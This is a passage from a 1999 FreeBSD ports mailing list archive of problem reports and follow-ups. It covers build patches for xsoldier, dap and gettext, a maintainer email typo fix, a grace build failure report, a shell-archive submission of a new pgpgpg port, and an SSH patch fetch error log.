¤ò½ñ¤¤¤Æ */ /* XPMINCFLAGS = -I$(XPMINCDIR) */ /* XPMLIBFLAGS = -L$(XPMLIBDIR) */ ! /* ¾å¤Î2¤Ä¤Î¥³¥á¥ó¥È¤ò²ò½ü¤·¤Æ¤¯¤À¤µ¤¤ */ ! /* ¥²¡¼¥à¤Î¥¦¥¨¥¤¥È */ WAIT = 35000 ! /* ¤½¤Î¾¥³¥ó¥Ñ¥¤¥ë¥ª¥×¥·¥ç¥ó */ ! /* -DDUPSCORE ¡Ä Ʊ°ì¿Íʪ¤¬¥Ï¥¤¥¹¥³¥¢¤ËÊ£¿ô¥¨¥ó¥È¥ê½ÐÍè¤ë */ ! /* -DSYSV ¡Ä SystemV ·Ï¤Ê¤É¤Ç random ´Ø¿ô¤¬Ìµ¤¤¾ì¹ç¡¤ */ ! /* ¤«¤ï¤ê¤Ë srand48 ¤È lrand48 ´Ø¿ô¤ò»ÈÍѤ·¤Þ¤¹ */ LOCAL_DEF = ! /* ¥¸¥ç¥¤¥¹¥Æ¥£¥Ã¥¯¤ò»È¤¦¾ì¹ç */ /* #define JOYSTICK */ /* ----------------------------------------------------------------------- */ ! /* ------------------ ¤½¤Î3 ¥¤¥ó¥¹¥È¡¼¥ë¥³¥Þ¥ó¥É¤ÎÀßÄê ------------------- */ /* ----------------------------------------------------------------------- */ ! /* Solaris¤Çopenwin¤ò»ÈÍѤ·¤Æ¥³¥ó¥Ñ¥¤¥ë¤¹¤ë¤È¤­¤ËɬÍ× */ /* INSTALL = /usr/ucb/install */ /* ----------------------------------------------------------------------- */ /* */ ! /* ´ðËÜŪ¤Ë¤³¤³¤«¤é²¼¤Ï¤¤¤Â¤é¤Ê¤¯¤ÆºÑ¤à¥Ï¥º */ /* */ /* ----------------------------------------------------------------------- */ --- 6,63 ---- /* ----------------------------------------------------------------------- */ ! /* ---------------------- PART1 INSTALL DIRECTORY ------------------------ */ /* ----------------------------------------------------------------------- */ ! /* Install Directory */ ! /* You can't install without write permission of these. => Unplayable. (^^;*/ ! PIXMAPDIR = /usr/X11R6/lib/X11/xsoldier ! SCOREDIR = /usr/X11R6/lib/X11/xsoldier ! BINDIR = /usr/X11R6/bin ! /* Score File Name. It's under SCOREDIR. */ SCOREFILE = .scorefile /* ----------------------------------------------------------------------- */ ! /* ------------------- PART2 COMPILE CONFIGURATION ----------------------- */ /* ----------------------------------------------------------------------- */ ! /* What compiler do you want to use? */ /* CC = gcc */ ! /* If you have xpm not in the X directory. */ /* XPMINCDIR = /usr/X11R6/include */ /* XPMLIBDIR = /usr/X11R6/lib */ ! /* Write path name here and ..... */ /* XPMINCFLAGS = -I$(XPMINCDIR) */ /* XPMLIBFLAGS = -L$(XPMLIBDIR) */ ! /* Uncomment the upper 2 lines. */ ! /* Game Wait */ WAIT = 35000 ! /* The other compile options */ ! /* -DDUPSCORE -> Allow multiple entry in the high score */ ! /* -DSYSV -> Specify when not have random functions(SystemV etc.) */ ! /* Use srand48 and lrand48 instead. */ LOCAL_DEF = ! /* When you use the joystick */ /* #define JOYSTICK */ /* ----------------------------------------------------------------------- */ ! /* ------------------ PART3 INSTALL COMMAND CONFIGURATION ---------------- */ /* ----------------------------------------------------------------------- */ ! /* You need this when you use openwin on Solaris. */ /* INSTALL = /usr/ucb/install */ /* ----------------------------------------------------------------------- */ /* */ ! /* Basically, you don't need change below. */ /* */ /* ----------------------------------------------------------------------- */ *************** *** 95,101 **** install.score:: @if [ -d $(SCOREDIR) ]; then chmod 755 $(SCOREDIR); \ else $(MKDIRHIER) $(SCOREDIR); chmod 755 $(SCOREDIR); fi ! $(INSTALL) -c -m 600 scorefile.txt $(SCOREDIR)/$(SCOREFILE) @echo "install score . done" install.pixmap:: --- 95,101 ---- install.score:: @if [ -d $(SCOREDIR) ]; then chmod 755 $(SCOREDIR); \ else $(MKDIRHIER) $(SCOREDIR); chmod 755 $(SCOREDIR); fi ! $(INSTALL) -c -g games -m 660 scorefile.txt $(SCOREDIR)/$(SCOREFILE) @echo "install score . done" install.pixmap:: *************** *** 109,113 **** install.bin:: @if [ -d $(BINDIR) ]; then set +x; \ else (set -x; $(MKDIRHIER) $(BINDIR)); fi ! $(INSTALL) -c -m 4755 $(PROGRAM) $(BINDIR)/$(PROGRAM) @echo "install bin . done" --- 109,113 ---- install.bin:: @if [ -d $(BINDIR) ]; then set +x; \ else (set -x; $(MKDIRHIER) $(BINDIR)); fi ! $(INSTALL) -c -g games -m 2755 $(PROGRAM) $(BINDIR)/$(PROGRAM) @echo "install bin . done" >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 16 13:54: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 81093156C1 for ; Thu, 16 Dec 1999 13:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA38324; Thu, 16 Dec 1999 13:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from henoch.cc.fh-lippe.de (henoch.cc.fh-lippe.de [193.16.112.72]) by hub.freebsd.org (Postfix) with ESMTP id 3FD74150A4 for ; Thu, 16 Dec 1999 13:42:18 -0800 (PST) (envelope-from lkoeller@cc.fh-lippe.de) Received: from spock.cc.fh-lippe.de([193.16.118.120]) (1701 bytes) by henoch.cc.fh-lippe.de via sendmail with P:smtp/R:inet_hosts/T:smtp (sender: ) id for ; Thu, 16 Dec 1999 22:42:12 +0100 (MET) (Smail-3.2.0.101 1997-Dec-17 #3 built 1998-Feb-3) Received: from door.lippe.de by spock.cc.fh-lippe.de with smtp (Smail3.1.29.1 #2) id m11yif5-0006zfC; Thu, 16 Dec 99 22:42 MET Received: from odie.lippe.de (odie.lippe.de [192.168.4.2]) by door.lippe.de (8.9.3/8.9.3) with ESMTP id WAA75452 for ; Thu, 16 Dec 1999 22:33:27 +0100 (CET) (envelope-from lkoeller@lippe.de) Received: (from lkoeller@localhost) by odie.lippe.de (8.9.3/8.9.3) id WAA94537; Thu, 16 Dec 1999 22:33:26 +0100 (CET) (envelope-from lkoeller) Message-Id: <199912162133.WAA94537@odie.lippe.de> Date: Thu, 16 Dec 1999 22:33:26 +0100 (CET) From: Lars Koeller Reply-To: lkoeller@cc.fh-lippe.de To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15522: hp2xx and tclock have wrong maintainer EMail address (typo)! Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15522 >Category: ports >Synopsis: Wrong Maintainer E-Mail in hp2xx and tclock ports (typo) >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Thu Dec 16 13:50:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Lars Koeller >Release: FreeBSD 3.3-RELEASE i386 >Organization: Fachhochschule Lippe, Lemgo, Germany >Environment: - >Description: The Maintainer in the hp2xx and tclock port are contains one Character too mucht :-( It schould be Lars.Koeller@Uni-Bielefeld.DE without the additional "e" between the "l" and "d" at the end of Bielefeld! :-) Sorry, but it seems to be my own fault! >How-To-Repeat: - >Fix: Correct the E-Mail address. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 16 13:54: 8 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4E48A157EC for ; Thu, 16 Dec 1999 13:50:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA38333; Thu, 16 Dec 1999 13:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from henoch.cc.fh-lippe.de (henoch.cc.fh-lippe.de [193.16.112.72]) by hub.freebsd.org (Postfix) with ESMTP id A598515088 for ; Thu, 16 Dec 1999 13:43:28 -0800 (PST) (envelope-from lkoeller@cc.fh-lippe.de) Received: from spock.cc.fh-lippe.de([193.16.118.120]) (2278 bytes) by henoch.cc.fh-lippe.de via sendmail with P:smtp/R:inet_hosts/T:smtp (sender: ) id for ; Thu, 16 Dec 1999 22:43:27 +0100 (MET) (Smail-3.2.0.101 1997-Dec-17 #3 built 1998-Feb-3) Received: from door.lippe.de by spock.cc.fh-lippe.de with smtp (Smail3.1.29.1 #2) id m11yigH-0006zfC; Thu, 16 Dec 99 22:43 MET Received: from odie.lippe.de (odie.lippe.de [192.168.4.2]) by door.lippe.de (8.9.3/8.9.3) with ESMTP id WAA75519 for ; Thu, 16 Dec 1999 22:42:56 +0100 (CET) (envelope-from lkoeller@lippe.de) Received: (from lkoeller@localhost) by odie.lippe.de (8.9.3/8.9.3) id WAA94734; Thu, 16 Dec 1999 22:42:55 +0100 (CET) (envelope-from lkoeller) Message-Id: <199912162142.WAA94734@odie.lippe.de> Date: Thu, 16 Dec 1999 22:42:55 +0100 (CET) From: lkoeller@cc.fh-lippe.de Reply-To: lkoeller@cc.fh-lippe.de To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15523: grace-5.03g still don't build (see http://bento.freebsd.org/errorlogs/) Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15523 >Category: ports >Synopsis: Motif/Lesstif not found when grace-5.0.3g is build >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Dec 16 13:50:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Lars Koeller >Release: FreeBSD 3.3-RELEASE i386 >Organization: Fachhochschule Lippe, Lemgo, Germany >Environment: Upcomming FreeBSD-3.4 Release i384 >Description: The error log on http://bento.freebsd.org/errorlogs/3-full/grace-5.0.3g.log seems trying to build the grace port without the motif/lesstif interface and runs into trouble. This problem exists since 3.3-RELEASE and I can't reproduce it at home! Building grace without the graphical userinterface is really nonsense, so I set REQUIRE_MOTIF= YES in the ports Makefile. Even if I build it with lesstif or Motif installed and the right entry in /etc/make.conf it builds and runs well on several machines at home and work. The problem seems to be a error in the test procedure on bento. >How-To-Repeat: Try to build it on bento. -> Error! Try to build it on a fresh installed Machine with lesstif/motif installed and /etc/make.conf set up corretly -> Works! >Fix: Don't know. I suspect /etc/make.conf is not set correctly in the ports-building-test-scripts on bento. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 16 14:16:51 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 69F7D156BD; Thu, 16 Dec 1999 14:16:50 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA40978; Thu, 16 Dec 1999 14:16:50 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Thu, 16 Dec 1999 14:16:50 -0800 (PST) From: Message-Id: <199912162216.OAA40978@freefall.freebsd.org> To: jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org, jedgar@FreeBSD.org Subject: Re: ports/15085: fixing-upgrading the editors/xenon port Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: fixing-upgrading the editors/xenon port Responsible-Changed-From-To: freebsd-ports->jedgar Responsible-Changed-By: jedgar Responsible-Changed-When: Thu Dec 16 14:14:05 PST 1999 Responsible-Changed-Why: Over to port's maintainer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 16 14:27:23 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id CA86414F45; Thu, 16 Dec 1999 14:27:19 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA41769; Thu, 16 Dec 1999 14:27:19 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Thu, 16 Dec 1999 14:27:19 -0800 (PST) From: Message-Id: <199912162227.OAA41769@freefall.freebsd.org> To: camel@avias.com, jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15464: can't install latest netpbm from ports Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: can't install latest netpbm from ports State-Changed-From-To: open->closed State-Changed-By: jedgar State-Changed-When: Thu Dec 16 14:25:18 PST 1999 State-Changed-Why: Duplicate of ports/15305. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 16 15:20: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 69F8015089 for ; Thu, 16 Dec 1999 15:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id PAA46012; Thu, 16 Dec 1999 15:20:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from mail.kt.rim.or.jp (ppp358.kt.rim.or.jp [202.247.140.58]) by hub.freebsd.org (Postfix) with ESMTP id 62388150FC for ; Thu, 16 Dec 1999 15:14:03 -0800 (PST) (envelope-from yoshiaki@kt.rim.or.jp) Received: (from yoshiaki@localhost) by singer.kt.rim.or.jp (8.9.3/3.7W-ppp-981208) id IAA01512; Fri, 10 Dec 1999 08:11:15 +0900 (JST) Message-Id: <199912092311.IAA01512@singer.kt.rim.or.jp> Date: Fri, 10 Dec 1999 08:11:15 +0900 (JST) From: yoshiaki@kt.rim.or.jp Reply-To: yoshiaki@kt.rim.or.jp To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15524: ports audio dap-2.0.2 MD5 probrem Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15524 >Category: ports >Synopsis: ports audio dap-2.0.2 MD5 probrem >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Dec 16 15:20:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Yoshiaki Uchikawa >Release: FreeBSD 4.0-CURRENT i386 >Organization: >Environment: FreeBSD 4.0-CURRENT #0: Tue Dec 7 02:46:04 JST 1999 root@singer.tertio.atoll:/usr/src/sys/compile/KSTSING1K CPU: AMD-K6(tm) 3D+ Processor (400.91-MHz 586-class CPU) pcm0: irq 9 at device 11.0 on pci0 >Description: DAP original author changes some sources. but DAP archive name have no version infomation. >How-To-Repeat: >Fix: diff -ruN patches.orig/patch-aa patches/patch-aa --- patches.orig/patch-aa Sat May 1 19:34:30 1999 +++ patches/patch-aa Tue Dec 7 01:58:58 1999 @@ -6,7 +6,7 @@ +all: DAP + +DAP: -+ (cd tooltips; make -f Makefile); ++ (cd tooltips; make -f Makefile.linux); + (cd libaudio; make -f Makefile.linux); + (cd libaudiofile; make -f Makefile.linux); + (cd spkit/spkit; make -f Makefile.linux); diff -ruN patches.orig/patch-ab patches/patch-ab --- patches.orig/patch-ab Sat May 1 19:34:30 1999 +++ patches/patch-ab Tue Dec 7 01:52:31 1999 @@ -1,4 +1,5 @@ -Index: libaudio/audio.h +--- libaudio/audio.h.orig Thu Nov 11 10:13:26 1999 ++++ libaudio/audio.h Mon Nov 15 07:57:08 1999 @@ -17,13 +17,15 @@ | ****************************************************************************/ @@ -16,15 +17,14 @@ #include #include #include -@@ -31,7 +33,11 @@ - #include - #include +@@ -33,6 +35,8 @@ #include -+#ifdef __FreeBSD__ + #ifdef __NetBSD__ + #include ++#elif __FreeBSD__ +#include -+#else + #else #include -+#endif - - #ifdef __cplusplus - extern "C" + #endif + +---- diff -ruN patches.orig/patch-af patches/patch-af --- patches.orig/patch-af Sun Oct 3 01:37:38 1999 +++ patches/patch-af Tue Dec 7 01:58:13 1999 @@ -1,5 +1,5 @@ ---- sound/Makefile.linux.orig Sat Oct 2 09:22:30 1999 -+++ sound/Makefile.linux Sat Oct 2 09:22:52 1999 +--- sound/Makefile.linux.orig Mon Nov 15 22:28:21 1999 ++++ sound/Makefile.linux Tue Dec 7 01:55:55 1999 @@ -1,5 +1,5 @@ -CC = gcc -CXX = g++ @@ -12,8 +12,8 @@ HOMEDIR = $(HOME) INCDIR = -I. -I.. -I$(SPKIT) -I$(MAINDIR) LIBDIR = -L$(SPKIT)/spkit -L$(AUDIO) -L$(AUDIOF) --CCFLAGS = -O1 -g3 -DNOFORMS -DLINUX -DBIGENDIAN -DUSINGGCC -Wall -+CCFLAGS = ${CXXFLAGS} -DNOFORMS -DLINUX -DUSINGGCC -Wall - LDFLAGS = $(LIBDIR) -ldsp -laudio -laudiofile -lm - - PROGS = SampleTest +-CCFLAGS = $(DEBUG) $(OPTIM) -DNOFORMS -DLINUX -DBIGENDIAN -DUSINGGCC -Wall ++CCFLAGS = ${CXXFLAGS} -DNOFORMS -DLINUX -DBIGENDIAN -DUSINGGCC -Wall + DEBUG = -g3 + OPTIM = -O1 + LDFLAGS = $(LIBDIR) -laudio -laudiofile -lm >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 16 16:10: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 02A6614BD3 for ; Thu, 16 Dec 1999 16:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id QAA50259; Thu, 16 Dec 1999 16:10:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id E80D315667; Thu, 16 Dec 1999 16:00:38 -0800 (PST) Message-Id: <19991217000038.E80D315667@hub.freebsd.org> Date: Thu, 16 Dec 1999 16:00:38 -0800 (PST) From: rguyom@mail.dotcom.fr To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15525: macro AM_GNU_GETTEXT will not make use of libintl Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15525 >Category: ports >Synopsis: macro AM_GNU_GETTEXT will not make use of libintl >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Dec 16 16:10:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Remi Guyomarch >Release: 3.4-RC >Organization: >Environment: FreeBSD diabolic-cow.mail.dotcom.fr 3.4-RC FreeBSD 3.4-RC #2: Wed Dec 15 06:24:51 CET 1999 root@diabolic-cow.mail.dotcom.fr:/usr/src/sys/compile/DIABOLIC-COW i386 >Description: The gettext port is buggy. The macro AM_GNU_GETTEXT in /usr/local/share/aclocal/gettext.m4 try to find where all the gettext stuff is located (in libc, in libintl, nowhere, etc...) But if it finds a suitable libintl, it forgets to set the INTLLIBS variable. I think this is why, for example, you can find a patch to add -lintl to CFLAGS in the gtk12 port. This is also why you can find a "--with-included-gettext" in the gnupg port. >How-To-Repeat: I will use the gnupg port as an example, but the problem is *not* in gnupg, it's really in gettext. Compile and install the gettext port. Compile and install the gnupg port. Patch /usr/local/share/aclocal/gettext.m4 with my patch. Then 'make patch' in the gnupg port and configure & compile by hand with : CPPFLAGS="-I/usr/local/include" LDFLAGS="-L/usr/local/lib" ./configure gmake Then launch ldd on the two binaries : $ ldd `which gpg` g10/gpg /usr/local/bin/gpg: libz.so.2 => /usr/lib/libz.so.2 (0x280d8000) libc.so.3 => /usr/lib/libc.so.3 (0x280e5000) g10/gpg: libz.so.2 => /usr/lib/libz.so.2 (0x280c8000) libc.so.3 => /usr/lib/libc.so.3 (0x280d5000) libgdbm.so.2 => /usr/local/lib/libgdbm.so.2 (0x28161000) libintl.so.1 => /usr/local/lib/libintl.so.1 (0x28167000) GnuPG is now linked with libintl.so. The link with libgdbm is a side effect of 1) specifying /usr/local/include & /usr/local/lib to configure. 2) having the gdbm port installed Then compare the size of the two binaries : (this is with "-O2 -m486" in /etc/make.conf) $ size `which gpg` g10/gpg text data bss dec hex filename 448981 9412 12276 470669 72e8d /usr/local/bin/gpg 413811 9420 7372 430603 6920b g10/gpg >Fix: Add this patch to /usr/ports/devel/gettext/patches/ : root@diabolic-cow /usr/ports/devel/gettext/work/gettext-0.10.35 diff -u m4/gettext.m4~ m4/gettext.m4 --- m4/gettext.m4~ Sun Nov 21 23:28:26 1999 +++ m4/gettext.m4 Thu Dec 16 23:20:01 1999 @@ -72,7 +72,11 @@ DATADIRNAME=lib]) INSTOBJEXT=.mo fi - fi + fi + + if test "$gt_cv_func_gettext_libintl" = "yes"; then + INTLLIBS='-lintl' + fi ]) if test "$CATOBJEXT" = "NONE"; then >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 16 17:15:22 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 97AF814D83; Thu, 16 Dec 1999 17:15:21 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id RAA59506; Thu, 16 Dec 1999 17:15:21 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Thu, 16 Dec 1999 17:15:21 -0800 (PST) From: Message-Id: <199912170115.RAA59506@freefall.freebsd.org> To: jedgar@FreeBSD.org, gnats-admin@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: pending/15415: port games/xqf: update to 0.9.1 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: port games/xqf: update to 0.9.1 Responsible-Changed-From-To: gnats-admin->freebsd-ports Responsible-Changed-By: jedgar Responsible-Changed-When: Thu Dec 16 17:12:57 PST 1999 Responsible-Changed-Why: Misfiled PR To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 16 18:50: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7183E1522D for ; Thu, 16 Dec 1999 18:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id SAA66331; Thu, 16 Dec 1999 18:50:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from megaweapon.zigg.com (megaweapon.zigg.com [206.114.60.8]) by hub.freebsd.org (Postfix) with ESMTP id 88567150A9 for ; Thu, 16 Dec 1999 18:42:09 -0800 (PST) (envelope-from matt@megaweapon.zigg.com) Received: (from matt@localhost) by megaweapon.zigg.com (8.9.3/8.9.3) id VAA51964; Thu, 16 Dec 1999 21:41:14 -0500 (EST) (envelope-from matt) Message-Id: <199912170241.VAA51964@megaweapon.zigg.com> Date: Thu, 16 Dec 1999 21:41:14 -0500 (EST) From: matt@zigg.com Reply-To: matt@zigg.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: ports/15526: [NEW PORT] security/pgpgpg: a wrapper for GnuPG to emulate PGP 2.6 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15526 >Category: ports >Synopsis: [NEW PORT] security/pgpgpg: a wrapper for GnuPG to emulate PGP 2.6 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Thu Dec 16 18:50:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Matt Behrens >Release: FreeBSD 3.3-STABLE i386 >Organization: >Environment: FreeBSD megaweapon.zigg.com 3.3-STABLE FreeBSD 3.3-STABLE #3: Sat Nov 27 15:38:05 EST 1999 matt@megaweapon.zigg.com:/usr/src/sys/compile/MEGAWEAPON i386 >Description: The attached shar file is a new port ``security/pgpgpg'', a wrapper program for GnuPG that allows it to emulate PGP 2.6. Very useful for things like the pgp{sign,encrypt,decode} scripts that come with mail/pine4. Note that this package in and of itself does not contain crypto, though it does depend on GnuPG which does. >How-To-Repeat: >Fix: # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # security/pgpgpg # security/pgpgpg/Makefile # security/pgpgpg/pkg # security/pgpgpg/pkg/COMMENT # security/pgpgpg/pkg/DESCR # security/pgpgpg/pkg/PLIST # security/pgpgpg/files # security/pgpgpg/files/md5 # echo c - security/pgpgpg mkdir -p security/pgpgpg > /dev/null 2>&1 echo x - security/pgpgpg/Makefile sed 's/^X//' >security/pgpgpg/Makefile << 'END-of-security/pgpgpg/Makefile' X# New ports collection makefile for: pgpgpg X# Version required: 0.13 X# Date created: 16 December 1999 X# Whom: Matt Behrens X# X# $FreeBSD$ X# X XDISTNAME= pgpgpg-0.13 XCATEGORIES= security XMASTER_SITES= http://www.nessie.de/mroth/pgpgpg/ \ X ftp://ftp.gnupg.org/pub/gcrypt/ X XMAINTAINER= matt@zigg.com X X# BUILD_DEPENDS is necessary because the configure script will bomb out X# if it can't find gpg. RUN_DEPENDS is necessary to make the package X# dependency register correctly. Hence the apparent redundancy. X XBUILD_DEPENDS= ${PREFIX}/bin/gpg:${PORTSDIR}/security/gnupg XRUN_DEPENDS= ${PREFIX}/bin/gpg:${PORTSDIR}/security/gnupg X XGNU_CONFIGURE= yes XCONFIGURE_ARGS= --with-gpg-path=${PREFIX}/bin/gpg X X.include END-of-security/pgpgpg/Makefile echo c - security/pgpgpg/pkg mkdir -p security/pgpgpg/pkg > /dev/null 2>&1 echo x - security/pgpgpg/pkg/COMMENT sed 's/^X//' >security/pgpgpg/pkg/COMMENT << 'END-of-security/pgpgpg/pkg/COMMENT' XWrapper for GnuPG to simulate PGP 2.6.x END-of-security/pgpgpg/pkg/COMMENT echo x - security/pgpgpg/pkg/DESCR sed 's/^X//' >security/pgpgpg/pkg/DESCR << 'END-of-security/pgpgpg/pkg/DESCR' Xpgpgpg is a wrapper around Gnu Privacy Guard which takes PGP 2.6 Xcommand line options, translates them, and calls GnuPG (Gnu Privacy XGuard) to perform the desired action. X XWWW: http://www.nessie.de/mroth/pgpgpg/ X X- Matt Behrens X matt@zigg.com END-of-security/pgpgpg/pkg/DESCR echo x - security/pgpgpg/pkg/PLIST sed 's/^X//' >security/pgpgpg/pkg/PLIST << 'END-of-security/pgpgpg/pkg/PLIST' Xbin/pgpgpg END-of-security/pgpgpg/pkg/PLIST echo c - security/pgpgpg/files mkdir -p security/pgpgpg/files > /dev/null 2>&1 echo x - security/pgpgpg/files/md5 sed 's/^X//' >security/pgpgpg/files/md5 << 'END-of-security/pgpgpg/files/md5' XMD5 (pgpgpg-0.13.tar.gz) = 63c5070fa1bd796dbac24455648016cd END-of-security/pgpgpg/files/md5 exit >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 16 19:24:27 1999 Delivered-To: freebsd-ports@freebsd.org Received: from station26.transbay.net (station26.transbay.net [209.133.53.226]) by hub.freebsd.org (Postfix) with ESMTP id BEE3B14EEB for ; Thu, 16 Dec 1999 19:24:25 -0800 (PST) (envelope-from root@station26.transbay.net) Received: (from root@localhost) by station26.transbay.net (8.9.3/8.9.3) id TAA08656 for ports@freebsd.org; Mon, 29 Mar 1999 19:45:52 -0800 (PST) (envelope-from root) Date: Mon, 29 Mar 1999 19:45:52 -0800 (PST) From: Charlie Root Message-Id: <199903300345.TAA08656@station26.transbay.net> To: ports@freebsd.org Subject: SSH still broken? Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ] >> patch-ssh-1.2.27-bsd.tty.chown doesn't seem to exist on this system. ] >> Attempting to fetch from http://www.ssh.fi/sshprotocols2/patches/. ] fetch: patch-ssh-1.2.27-bsd.tty.chown: www.ssh.fi: HTTP server returned error code 302 ] >> Attempting to fetch from ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/distfiles/. ] fetch: pub/FreeBSD/ports/distfiles/patch-ssh-1.2.27-bsd.tty.chown: cannot get remote modification time ] fetch: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/distfiles/patch-ssh-1.2.27-bsd.tty.chown: FTP error: ] fetch: File unavailable (e.g., file not 